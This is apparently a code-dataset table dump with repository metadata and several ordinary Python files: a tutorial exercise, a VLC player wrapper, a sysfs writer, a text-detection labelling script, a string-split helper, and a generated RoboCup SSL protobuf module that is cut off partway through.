hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a79c5aa4cc942ec50133c91570519a3c6638f53 | 208 | py | Python | python-hard-way/ex33.py | calebgregory/scraps | cfc0ef608db4520c1a1e22fccdbcae73dfb00e39 | [
"MIT"
] | null | null | null | python-hard-way/ex33.py | calebgregory/scraps | cfc0ef608db4520c1a1e22fccdbcae73dfb00e39 | [
"MIT"
] | null | null | null | python-hard-way/ex33.py | calebgregory/scraps | cfc0ef608db4520c1a1e22fccdbcae73dfb00e39 | [
"MIT"
] | null | null | null | def print_multiples(start, finish, inc):
i = start
numbers = []
while i < finish:
numbers.append(i)
i = i + inc
print "Numbers now: ", numbers
print_multiples(6,100,9)
| 16 | 40 | 0.567308 | 27 | 208 | 4.296296 | 0.518519 | 0.241379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035211 | 0.317308 | 208 | 12 | 41 | 17.333333 | 0.78169 | 0 | 0 | 0 | 0 | 0 | 0.062802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.375 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a7b65e5bd38986b2df936f442af942a382962b7 | 420 | py | Python | RadioStation/Player/VLCPlayer.py | m-mohiey/AutomaticRadioStation | 9ec3935e08ef58302d314387bc107bd1be8a6418 | [
"MIT"
] | null | null | null | RadioStation/Player/VLCPlayer.py | m-mohiey/AutomaticRadioStation | 9ec3935e08ef58302d314387bc107bd1be8a6418 | [
"MIT"
] | null | null | null | RadioStation/Player/VLCPlayer.py | m-mohiey/AutomaticRadioStation | 9ec3935e08ef58302d314387bc107bd1be8a6418 | [
"MIT"
] | null | null | null | from . import AbstractPlayer
import vlc
class VLCPlayer(AbstractPlayer):
def __init__(self):
self.player = vlc.MediaPlayer()
self.program = None
def open(self, program):
self.player.set_mrl(program.media.path)
def play(self):
self.player.play()
def stop(self):
self.player.stop()
def wait(self):
while self.player.is_playing():
pass
| 18.26087 | 47 | 0.609524 | 50 | 420 | 5 | 0.5 | 0.2 | 0.168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.280952 | 420 | 22 | 48 | 19.090909 | 0.827815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.066667 | 0.133333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8a7dafa03dfd357aead512b804e640ce1f6f45ee | 737 | py | Python | bot1/engine/sysfs_writer.py | dpm76/Bot1 | a8e4f6cbc6e4f1d5f1a373a8b3c43811df6446f8 | [
"MIT"
] | null | null | null | bot1/engine/sysfs_writer.py | dpm76/Bot1 | a8e4f6cbc6e4f1d5f1a373a8b3c43811df6446f8 | [
"MIT"
] | null | null | null | bot1/engine/sysfs_writer.py | dpm76/Bot1 | a8e4f6cbc6e4f1d5f1a373a8b3c43811df6446f8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Created on 06/04/2015
@author: david
'''
from os import system
class SysfsWriter(object):
@staticmethod
def writeOnce(text, path):
'''
writer = SysfsWriter(path)
writer.write(text)
writer.close()
'''
system("echo {0} > {1}".format(text, path))
def __init__(self, path):
'''
Constructor
'''
self._path = path
#self._file = open(path, "a")
def write(self, text):
#self._file.write(text)
#self._file.flush()
SysfsWriter.writeOnce(text, self._path)
def close(self):
#self._file.close()
pass
| 17.139535 | 51 | 0.481682 | 73 | 737 | 4.726027 | 0.506849 | 0.092754 | 0.069565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02407 | 0.379919 | 737 | 42 | 52 | 17.547619 | 0.730853 | 0.297151 | 0 | 0 | 0 | 0 | 0.031532 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0.090909 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8a82aa98649815d03079e4e5c9ac7d5a804f4112 | 15,091 | py | Python | Detection/AdvancedEAST/label.py | TomHacker/VTD | 3009fd53cec8a86493b5f1960e8879e5a0c7345c | [
"Apache-2.0"
] | 1 | 2020-01-01T14:38:44.000Z | 2020-01-01T14:38:44.000Z | Detection/AdvancedEAST/label.py | TomHacker/VTD | 3009fd53cec8a86493b5f1960e8879e5a0c7345c | [
"Apache-2.0"
] | null | null | null | Detection/AdvancedEAST/label.py | TomHacker/VTD | 3009fd53cec8a86493b5f1960e8879e5a0c7345c | [
"Apache-2.0"
] | 1 | 2020-01-07T12:04:33.000Z | 2020-01-07T12:04:33.000Z | import numpy as np
import os
from PIL import Image, ImageDraw
from tqdm import tqdm
from Detection.AdvancedEAST import cfg
from Detection.AdvancedEAST.preprocess import preprocess_single_image,preprocess_no_cfg
def point_inside_of_quad(px, py, quad_xy_list, p_min, p_max):
if (p_min[0] <= px <= p_max[0]) and (p_min[1] <= py <= p_max[1]):
xy_list = np.zeros((4, 2))
xy_list[:3, :] = quad_xy_list[1:4, :] - quad_xy_list[:3, :]
xy_list[3] = quad_xy_list[0, :] - quad_xy_list[3, :]
yx_list = np.zeros((4, 2))
yx_list[:, :] = quad_xy_list[:, -1:-3:-1]
a = xy_list * ([py, px] - yx_list)
b = a[:, 0] - a[:, 1]
if np.amin(b) >= 0 or np.amax(b) <= 0:
return True
else:
return False
else:
return False
def point_inside_of_nth_quad(px, py, xy_list, shrink_1, long_edge):
nth = -1
vs = [[[0, 0, 3, 3, 0], [1, 1, 2, 2, 1]],
[[0, 0, 1, 1, 0], [2, 2, 3, 3, 2]]]
for ith in range(2):
quad_xy_list = np.concatenate((
np.reshape(xy_list[vs[long_edge][ith][0]], (1, 2)),
np.reshape(shrink_1[vs[long_edge][ith][1]], (1, 2)),
np.reshape(shrink_1[vs[long_edge][ith][2]], (1, 2)),
np.reshape(xy_list[vs[long_edge][ith][3]], (1, 2))), axis=0)
p_min = np.amin(quad_xy_list, axis=0)
p_max = np.amax(quad_xy_list, axis=0)
if point_inside_of_quad(px, py, quad_xy_list, p_min, p_max):
if nth == -1:
nth = ith
else:
nth = -1
break
return nth
def shrink(xy_list, ratio=cfg.shrink_ratio):
if ratio == 0.0:
return xy_list, xy_list
diff_1to3 = xy_list[:3, :] - xy_list[1:4, :]
diff_4 = xy_list[3:4, :] - xy_list[0:1, :]
diff = np.concatenate((diff_1to3, diff_4), axis=0)
dis = np.sqrt(np.sum(np.square(diff), axis=-1))
# determine which are long or short edges
long_edge = int(np.argmax(np.sum(np.reshape(dis, (2, 2)), axis=0)))
short_edge = 1 - long_edge
# cal r length array
r = [np.minimum(dis[i], dis[(i + 1) % 4]) for i in range(4)]
# cal theta array
diff_abs = np.abs(diff)
diff_abs[:, 0] += cfg.epsilon
theta = np.arctan(diff_abs[:, 1] / diff_abs[:, 0])
# shrink two long edges
temp_new_xy_list = np.copy(xy_list)
shrink_edge(xy_list, temp_new_xy_list, long_edge, r, theta, ratio)
shrink_edge(xy_list, temp_new_xy_list, long_edge + 2, r, theta, ratio)
# shrink two short edges
new_xy_list = np.copy(temp_new_xy_list)
shrink_edge(temp_new_xy_list, new_xy_list, short_edge, r, theta, ratio)
shrink_edge(temp_new_xy_list, new_xy_list, short_edge + 2, r, theta, ratio)
return temp_new_xy_list, new_xy_list, long_edge
def shrink_edge(xy_list, new_xy_list, edge, r, theta, ratio=cfg.shrink_ratio):
if ratio == 0.0:
return
start_point = edge
end_point = (edge + 1) % 4
long_start_sign_x = np.sign(
xy_list[end_point, 0] - xy_list[start_point, 0])
new_xy_list[start_point, 0] = \
xy_list[start_point, 0] + \
long_start_sign_x * ratio * r[start_point] * np.cos(theta[start_point])
long_start_sign_y = np.sign(
xy_list[end_point, 1] - xy_list[start_point, 1])
new_xy_list[start_point, 1] = \
xy_list[start_point, 1] + \
long_start_sign_y * ratio * r[start_point] * np.sin(theta[start_point])
# long edge one, end point
long_end_sign_x = -1 * long_start_sign_x
new_xy_list[end_point, 0] = \
xy_list[end_point, 0] + \
long_end_sign_x * ratio * r[end_point] * np.cos(theta[start_point])
long_end_sign_y = -1 * long_start_sign_y
new_xy_list[end_point, 1] = \
xy_list[end_point, 1] + \
long_end_sign_y * ratio * r[end_point] * np.sin(theta[start_point])
def process_label(data_dir=cfg.data_dir):
with open(os.path.join(data_dir, cfg.val_fname), 'r') as f_val:
f_list = f_val.readlines()
with open(os.path.join(data_dir, cfg.train_fname), 'r') as f_train:
f_list.extend(f_train.readlines())
for line, _ in zip(f_list, tqdm(range(len(f_list)))):
line_cols = str(line).strip('\n').split(',')
img_name, width, height = \
line_cols[0].strip(), int(line_cols[1].strip()), \
int(line_cols[2].strip())
gt = np.zeros((height // cfg.pixel_size, width // cfg.pixel_size, 7))
train_label_dir = os.path.join(data_dir, cfg.train_label_dir_name)
xy_list_array = np.load(os.path.join(train_label_dir,
img_name.replace('.jpg','.npy')))
train_image_dir = os.path.join(data_dir, cfg.train_image_dir_name)
with Image.open(os.path.join(train_image_dir, img_name)) as im:
draw = ImageDraw.Draw(im)
for xy_list in xy_list_array:
_, shrink_xy_list, _ = shrink(xy_list, cfg.shrink_ratio)
shrink_1, _, long_edge = shrink(xy_list, cfg.shrink_side_ratio)
p_min = np.amin(shrink_xy_list, axis=0)
p_max = np.amax(shrink_xy_list, axis=0)
# floor of the float
ji_min = (p_min / cfg.pixel_size - 0.5).astype(int) - 1
# +1 for ceil of the float and +1 for include the end
ji_max = (p_max / cfg.pixel_size - 0.5).astype(int) + 3
imin = np.maximum(0, ji_min[1])
imax = np.minimum(height // cfg.pixel_size, ji_max[1])
jmin = np.maximum(0, ji_min[0])
jmax = np.minimum(width // cfg.pixel_size, ji_max[0])
for i in range(imin, imax):
for j in range(jmin, jmax):
px = (j + 0.5) * cfg.pixel_size
py = (i + 0.5) * cfg.pixel_size
if point_inside_of_quad(px, py,
shrink_xy_list, p_min, p_max):
gt[i, j, 0] = 1
line_width, line_color = 1, 'red'
ith = point_inside_of_nth_quad(px, py,
xy_list,
shrink_1,
long_edge)
vs = [[[3, 0], [1, 2]], [[0, 1], [2, 3]]]
if ith in range(2):
gt[i, j, 1] = 1
if ith == 0:
line_width, line_color = 2, 'yellow'
else:
line_width, line_color = 2, 'green'
gt[i, j, 2:3] = ith
gt[i, j, 3:5] = \
xy_list[vs[long_edge][ith][0]] - [px, py]
gt[i, j, 5:] = \
xy_list[vs[long_edge][ith][1]] - [px, py]
draw.line([(px - 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size),
(px + 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size),
(px + 0.5 * cfg.pixel_size,
py + 0.5 * cfg.pixel_size),
(px - 0.5 * cfg.pixel_size,
py + 0.5 * cfg.pixel_size),
(px - 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size)],
width=line_width, fill=line_color)
act_image_dir = os.path.join(cfg.data_dir,
cfg.show_act_image_dir_name)
if cfg.draw_act_quad:
im.save(os.path.join(act_image_dir, img_name))
train_label_dir = os.path.join(data_dir, cfg.train_label_dir_name)
np.save(os.path.join(train_label_dir,
img_name.replace('.jpg', '_gt.npy')), gt)
def process_label_no_cfg(data_dir,shape):
print('start preprocessing......')
preprocess_no_cfg(data_dir,shape)
print('*'*100)
print('*' * 100)
print('start process labels......')
with open(os.path.join(data_dir, cfg.val_fname), 'r') as f_val:
f_list = f_val.readlines()
with open(os.path.join(data_dir, cfg.train_fname), 'r') as f_train:
f_list.extend(f_train.readlines())
for line, _ in zip(f_list, tqdm(range(len(f_list)))):
line_cols = str(line).strip('\n').split(',')
img_name, width, height = \
line_cols[0].strip(), shape, shape
gt = np.zeros((height // cfg.pixel_size, width // cfg.pixel_size, 7))
train_label_dir = os.path.join(data_dir, cfg.train_label_dir_name)
xy_list_array = np.load(os.path.join(train_label_dir,
img_name.replace('.jpg','.npy')))
train_image_dir = os.path.join(data_dir, cfg.train_image_dir_name)
with Image.open(os.path.join(train_image_dir, img_name)) as im:
draw = ImageDraw.Draw(im)
for xy_list in xy_list_array:
_, shrink_xy_list, _ = shrink(xy_list, cfg.shrink_ratio)
shrink_1, _, long_edge = shrink(xy_list, cfg.shrink_side_ratio)
p_min = np.amin(shrink_xy_list, axis=0)
p_max = np.amax(shrink_xy_list, axis=0)
# floor of the float
ji_min = (p_min / cfg.pixel_size - 0.5).astype(int) - 1
# +1 for ceil of the float and +1 for include the end
ji_max = (p_max / cfg.pixel_size - 0.5).astype(int) + 3
imin = np.maximum(0, ji_min[1])
imax = np.minimum(height // cfg.pixel_size, ji_max[1])
jmin = np.maximum(0, ji_min[0])
jmax = np.minimum(width // cfg.pixel_size, ji_max[0])
for i in range(imin, imax):
for j in range(jmin, jmax):
px = (j + 0.5) * cfg.pixel_size
py = (i + 0.5) * cfg.pixel_size
if point_inside_of_quad(px, py,
shrink_xy_list, p_min, p_max):
gt[i, j, 0] = 1
line_width, line_color = 1, 'red'
ith = point_inside_of_nth_quad(px, py,
xy_list,
shrink_1,
long_edge)
vs = [[[3, 0], [1, 2]], [[0, 1], [2, 3]]]
if ith in range(2):
gt[i, j, 1] = 1
if ith == 0:
line_width, line_color = 2, 'yellow'
else:
line_width, line_color = 2, 'green'
gt[i, j, 2:3] = ith
gt[i, j, 3:5] = \
xy_list[vs[long_edge][ith][0]] - [px, py]
gt[i, j, 5:] = \
xy_list[vs[long_edge][ith][1]] - [px, py]
draw.line([(px - 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size),
(px + 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size),
(px + 0.5 * cfg.pixel_size,
py + 0.5 * cfg.pixel_size),
(px - 0.5 * cfg.pixel_size,
py + 0.5 * cfg.pixel_size),
(px - 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size)],
width=line_width, fill=line_color)
act_image_dir = os.path.join(cfg.data_dir,
cfg.show_act_image_dir_name)
if cfg.draw_act_quad:
im.save(os.path.join(act_image_dir, img_name))
train_label_dir = os.path.join(data_dir, cfg.train_label_dir_name)
np.save(os.path.join(train_label_dir,
img_name.replace('.jpg', '_gt.npy')), gt)
print(os.path.join(train_label_dir,
img_name.replace('.jpg', '_gt.npy'))+' Shape is{} Done!'.format(gt.shape))
def process_label_single_image(img_name,shape):
width,height=shape,shape
gt = np.zeros((height // cfg.pixel_size, width // cfg.pixel_size, 7))
resized_img,xy_list_array=preprocess_single_image(img_name)
for xy_list in xy_list_array:
_, shrink_xy_list, _ = shrink(xy_list, cfg.shrink_ratio)
shrink_1, _, long_edge = shrink(xy_list, cfg.shrink_side_ratio)
p_min = np.amin(shrink_xy_list, axis=0)
p_max = np.amax(shrink_xy_list, axis=0)
# floor of the float
ji_min = (p_min / cfg.pixel_size - 0.5).astype(int) - 1
# +1 for ceil of the float and +1 for include the end
ji_max = (p_max / cfg.pixel_size - 0.5).astype(int) + 3
imin = np.maximum(0, ji_min[1])
imax = np.minimum(height // cfg.pixel_size, ji_max[1])
jmin = np.maximum(0, ji_min[0])
jmax = np.minimum(width // cfg.pixel_size, ji_max[0])
for i in range(imin, imax):
for j in range(jmin, jmax):
px = (j + 0.5) * cfg.pixel_size
py = (i + 0.5) * cfg.pixel_size
if point_inside_of_quad(px, py,
shrink_xy_list, p_min, p_max):
gt[i, j, 0] = 1
line_width, line_color = 1, 'red'
ith = point_inside_of_nth_quad(px, py,
xy_list,
shrink_1,
long_edge)
vs = [[[3, 0], [1, 2]], [[0, 1], [2, 3]]]
if ith in range(2):
gt[i, j, 1] = 1
if ith == 0:
line_width, line_color = 2, 'yellow'
else:
line_width, line_color = 2, 'green'
gt[i, j, 2:3] = ith
gt[i, j, 3:5] = \
xy_list[vs[long_edge][ith][0]] - [px, py]
gt[i, j, 5:] = \
xy_list[vs[long_edge][ith][1]] - [px, py]
return resized_img,gt
if __name__ == '__main__':
process_label_no_cfg('E:\py_projects\data_new\data_new\data',256)
| 50.811448 | 103 | 0.477238 | 2,059 | 15,091 | 3.226323 | 0.081107 | 0.079482 | 0.079482 | 0.039139 | 0.793467 | 0.753726 | 0.729339 | 0.693964 | 0.682372 | 0.672136 | 0 | 0.03375 | 0.401166 | 15,091 | 296 | 104 | 50.983108 | 0.701339 | 0.023656 | 0 | 0.667897 | 0 | 0 | 0.014673 | 0.002513 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02583 | false | 0 | 0.02214 | 0 | 0.077491 | 0.01845 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a8850dc06a3031c04aec4d9fd3759f0f774b453 | 157 | py | Python | tbot/utils/split.py | thomaserlang/tbot | 99cfa204d86ef35cf2cc9482ae5a44abb35b443a | [
"MIT"
] | null | null | null | tbot/utils/split.py | thomaserlang/tbot | 99cfa204d86ef35cf2cc9482ae5a44abb35b443a | [
"MIT"
] | 10 | 2022-02-14T11:40:20.000Z | 2022-03-09T22:44:03.000Z | tbot/utils/split.py | thomaserlang/tbot | 99cfa204d86ef35cf2cc9482ae5a44abb35b443a | [
"MIT"
] | 1 | 2020-09-19T16:38:24.000Z | 2020-09-19T16:38:24.000Z | import shlex
def split(s):
if '"' not in s:
return s.split(' ')
try:
return list(shlex.split(s))
except ValueError:
pass | 17.444444 | 35 | 0.535032 | 21 | 157 | 4 | 0.666667 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.343949 | 157 | 9 | 36 | 17.444444 | 0.815534 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.125 | 0.125 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
8a8995ef6b40809aa8fcabb717f831f30ee25474 | 11,530 | py | Python | Communication/messages_robocup_ssl_detection_pb2.py | MaximeGLegault/UI-Debug | f91e48cb9ffe11e78eafdd2c7a23c525d6cd6e97 | [
"MIT"
] | 2 | 2018-03-13T17:22:35.000Z | 2019-10-17T11:46:01.000Z | Communication/messages_robocup_ssl_detection_pb2.py | MaximeGLegault/UI-Debug | f91e48cb9ffe11e78eafdd2c7a23c525d6cd6e97 | [
"MIT"
] | 73 | 2016-05-30T04:52:41.000Z | 2019-06-21T03:11:49.000Z | Communication/messages_robocup_ssl_detection_pb2.py | MaximeGLegault/UI-Debug | f91e48cb9ffe11e78eafdd2c7a23c525d6cd6e97 | [
"MIT"
] | 11 | 2016-05-30T04:44:41.000Z | 2019-04-13T12:02:14.000Z | # Under MIT License, see LICENSE.txt
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: messages_robocup_ssl_detection.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='messages_robocup_ssl_detection.proto',
package='',
serialized_pb=_b('\n$messages_robocup_ssl_detection.proto\"x\n\x11SSL_DetectionBall\x12\x12\n\nconfidence\x18\x01 \x02(\x02\x12\x0c\n\x04\x61rea\x18\x02 \x01(\r\x12\t\n\x01x\x18\x03 \x02(\x02\x12\t\n\x01y\x18\x04 \x02(\x02\x12\t\n\x01z\x18\x05 \x01(\x02\x12\x0f\n\x07pixel_x\x18\x06 \x02(\x02\x12\x0f\n\x07pixel_y\x18\x07 \x02(\x02\"\x97\x01\n\x12SSL_DetectionRobot\x12\x12\n\nconfidence\x18\x01 \x02(\x02\x12\x10\n\x08robot_id\x18\x02 \x01(\r\x12\t\n\x01x\x18\x03 \x02(\x02\x12\t\n\x01y\x18\x04 \x02(\x02\x12\x13\n\x0borientation\x18\x05 \x01(\x02\x12\x0f\n\x07pixel_x\x18\x06 \x02(\x02\x12\x0f\n\x07pixel_y\x18\x07 \x02(\x02\x12\x0e\n\x06height\x18\x08 \x01(\x02\"\xd9\x01\n\x12SSL_DetectionFrame\x12\x14\n\x0c\x66rame_number\x18\x01 \x02(\r\x12\x11\n\tt_capture\x18\x02 \x02(\x01\x12\x0e\n\x06t_sent\x18\x03 \x02(\x01\x12\x11\n\tcamera_id\x18\x04 \x02(\r\x12!\n\x05\x62\x61lls\x18\x05 \x03(\x0b\x32\x12.SSL_DetectionBall\x12*\n\rrobots_yellow\x18\x06 \x03(\x0b\x32\x13.SSL_DetectionRobot\x12(\n\x0brobots_blue\x18\x07 \x03(\x0b\x32\x13.SSL_DetectionRobot')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_SSL_DETECTIONBALL = _descriptor.Descriptor(
name='SSL_DetectionBall',
full_name='SSL_DetectionBall',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='confidence', full_name='SSL_DetectionBall.confidence', index=0,
number=1, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='area', full_name='SSL_DetectionBall.area', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='x', full_name='SSL_DetectionBall.x', index=2,
number=3, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='y', full_name='SSL_DetectionBall.y', index=3,
number=4, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='z', full_name='SSL_DetectionBall.z', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pixel_x', full_name='SSL_DetectionBall.pixel_x', index=5,
number=6, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pixel_y', full_name='SSL_DetectionBall.pixel_y', index=6,
number=7, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=40,
serialized_end=160,
)
_SSL_DETECTIONROBOT = _descriptor.Descriptor(
name='SSL_DetectionRobot',
full_name='SSL_DetectionRobot',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='confidence', full_name='SSL_DetectionRobot.confidence', index=0,
number=1, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='robot_id', full_name='SSL_DetectionRobot.robot_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='x', full_name='SSL_DetectionRobot.x', index=2,
number=3, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
